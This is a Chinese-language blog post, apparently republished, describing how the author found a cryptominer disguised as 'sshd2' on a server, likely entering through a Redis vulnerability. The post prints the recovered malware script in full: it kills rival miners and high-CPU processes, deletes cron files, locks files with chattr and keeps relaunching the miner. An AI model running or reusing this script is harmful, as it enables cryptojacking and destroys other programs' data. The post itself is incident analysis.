1. 全栈程序员必看首页

python挖矿脚本代码_一个挖矿脚本

全栈程序员-站长 未分类 阅读 24

python挖矿脚本代码_一个挖矿脚本遇到一台机器偶尔cpu使用率达到80%,触发告警。登录查看后一个sshd2程序导致cpu负载高仔细查看就知道和sshd是两个完全不同的进程,取名sshd2应该只是为了迷惑用户ps-ef查看到父进程是一个/tmp/javax/config.sh,这个文件在当前系统已经删除了,所以只能按照pid号通过lsof-pPID查看打开的文件句柄在/proc/PID/fd里面顺利找到执行脚本#!/bin…

大家好,又见面了,我是你们的朋友全栈君。

遇到一台机器偶尔cpu使用率达到80%,触发告警。登录查看后一个sshd2程序导致cpu负载高

仔细查看就知道和sshd是两个完全不同的进程,取名sshd2应该只是为了迷惑用户

ps -ef查看到父进程是一个/tmp/javax/config.sh, 这个文件在当前系统已经删除了,所以只能按照pid号通过lsof -p PID查看打开的文件句柄

在/proc/PID/fd里面顺利找到执行脚本

#!/bin/sh

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

while [ 1 ]

do

p=$(ps auxf|grep -v grep|grep sshd2|wc -l)

if [ ${p} -eq 0 ];

then

ps auxf|grep -v grep | awk ‘{if($3>=80.0) print $2}’| xargs kill -9

fi

chattr -i /var/spool/cron/root

chattr -i /var/spool/cron/crontabs/root

chattr -i /usr/local/bin/dns

pkill 6Tx3Wq

rm -f /tmp/6Tx3Wq

killall -9 38c985b26d38da0cbcc9f8ae3527e8e3b

killall -9 /tmp/.sysinfo/*

rm -f /tmp/.sysinfo/*

chattr +i /tmp/.sysinfo

rm -f /var/spool/cron/root

rm -f /var/spool/cron/backup.db

rm -f /var/spool/cron/dump.rdb

rm -f /var/spool/cron/jw

rm -f /var/spool/cron/uo

rm -f /var/spool/cron/vf

rm -f /tmp/root

rm -f /tmp/backup.db

rm -f /tmp/dump.rdb

rm -f /tmp/root

rm -f /var/spool/cron/crontabs/root

rm -f /var/spool/cron/crontabs/dump.rdb

killall -9 kworkerds

chattr -i /etc/cron.d/root

chattr -i /etc/cron.d/apache

chattr -i /etc/cron.d/0hourly

rm -f /etc/cron.d/root

rm -f /etc/cron.d/apache

rm -f /etc/cron.d/0hourly

rm -f /tmp/kworkerds

rm -f /var/tmp/kworkerds

rm -f /etc/cron.hourly/oanacroner

rm -f /etc/cron.hourly/oanacrona

rm -f /etc/cron.daily/oanacroner

rm -f /etc/cron.daily/oanacrona

rm -f /etc/cron.monthly/oanacroner

rm -f /usr/local/bin/dns

pkill .systemcero

pkill vTtHH

pkill -f /tmp/just4root

pkill -f /tmp/just4copy

pkill -f /tmp/dc_name

pkill x7

pkill cloudupdate

pkill diskmanagerd

pkill curl

pkill jspserv

pkill init

pkill sysupdate

pkill sysguard

pkill networkservice

pkill watchbog

rm -f /usr/share/watchbog/watchbog

rm -f /bin/httpsntp

rm -f /bin/ftpsntp

rm -f /tmp/.systemcero

rm -f /tmp/vTtHH

rm -f /usr/bin/.systemcero

rm -f /usr/bin/cloudupdate

rm -f /usr/bin/diskmanagerd

rm -f /lib/libterminfo.so

rm -f /tmp/config.json

rm -f /var/tmp/jspserv

rm -f /etc/update.sh

chattr -i /etc/sysupdate

rm -f /etc/sysupdate

rm -f /etc/config.json

echo >/tmp/6Tx3Wq

echo >/tmp/vTtHH

chattr +i /tmp/6Tx3Wq

chattr +i /tmp/vTtHH

p=$(ps auxf|grep sshd2|awk ‘{if($3>=70.0) print $2}’)

name=””$p

if [ -z “$name” ]

then

ps auxf|grep -v grep | awk ‘{if($3>=80.0) print $2}’| xargs kill -9

nohup /tmp/javax/sshd2 &>>/dev/null &

else

:

fi

sleep 60

done

从脚本的删除动作来看,可能是通过redis的漏洞进来的,脚本似乎还想努力不让监控发现

修复方案

时间短,修复不是我来操作的。初步并没有发现隐藏的激活方式,所以按照上面脚本的内容反向处理一下应该就可以了,注意防范redis的漏洞。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/158472.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • 2021.12.13phpstorm激活码【2021免费激活】 idea

    2021.12.13phpstorm激活码【2021免费激活】

    (2021.12.13phpstorm激活码)本文适用于JetBrains家族所有ide,包括IntelliJidea,phpstorm,webstorm,pycharm,datagrip等。IntelliJ2021最新激活注册码,破解教程可免费永久激活,亲测有效,下面是详细链接哦~https://javaforall.net/100143.html…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年3月30日
    44
  • tomcat 配置环境变量

    tomcat 配置环境变量

    tomcat 配置环境变量最近换电脑,备注一下tomcat环境变量配置 1、官网下载tomcat,并解压 2、找到tomcat解压路径,配置三个环境变量新建CATALINA_HOME环境变量,CATALINA_HOME=E:\tomcat\apache-tomcat-8.5.38新建CATALINA_BASE环境变量,CATALINA_BASE=E:\tomcat\a…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年4月28日
    46
  • <span>基于 CAS 无锁实现的 Disruptor.NET 居然慢于 BlockingCollection,是真的吗?</span>

    基于 CAS 无锁实现的 Disruptor.NET 居然慢于 BlockingCollection,是真的吗?

    基于 CAS 无锁实现的 Disruptor.NET 居然慢于 BlockingCollection,是真的吗?

    全栈程序员-站长的头像 全栈程序员-站长
    2021年11月24日
    41
  • 【机器学习】一文读懂正则化与LASSO回归,Ridge回归

    【机器学习】一文读懂正则化与LASSO回归,Ridge回归

    【机器学习】一文读懂正则化与LASSO回归,Ridge回归该文已经收录到专题机器学习进阶之路当中,欢迎大家关注。1.过拟合当样本特征很多,样本数相对较少时,模型容易陷入过拟合。为了缓解过拟合问题,有两种方法:方法一:减少特征数量(人工选择重要特征来保留,会丢弃部分信息)。方法二:正则化(减少特征参数的数量级)。2.正则化(Regularization)正则化是结构风险(损失函数+正则化项)最小化策略的体…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月10日
    36
  • Kaptcha验证码SSM实现

    Kaptcha验证码SSM实现

    Kaptcha验证码SSM实现Kaptcha验证码SSM实现CodeUtil静态类:用于接收验证码图片上字符串及验证码框里字符串,并且比较两者,相等返回ture。importjavax.servlet.http.HttpServletRequest;publicclassCodeUtil{publicstaticbooleancheckVerifyCode(HttpServletRequest…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月22日
    51
  • java代码生成器,springboot代码生成器—增加更新,查询功能(持续更新)

    java代码生成器,springboot代码生成器—增加更新,查询功能(持续更新)

    java代码生成器,springboot代码生成器—增加更新,查询功能(持续更新)时隔一周多,今天终于抽出时间来更新一波代码生成器,最近公司让我研究rpa,弄得焦头烂额的,话不多说,进入正题。之前有朋友让我讲一下代码生成器的原理,这篇博客就大体描述一下,以后慢慢细致讲解。双击codeMan.exe,众所周知,java做成exe程序很麻烦,在这里我是利用了.net的ikvm插件把jar包直接编译成了exe程序,这个启动界面会连接我的服务器,去检查版本更新,如果有更新就会在…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月5日
    33

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号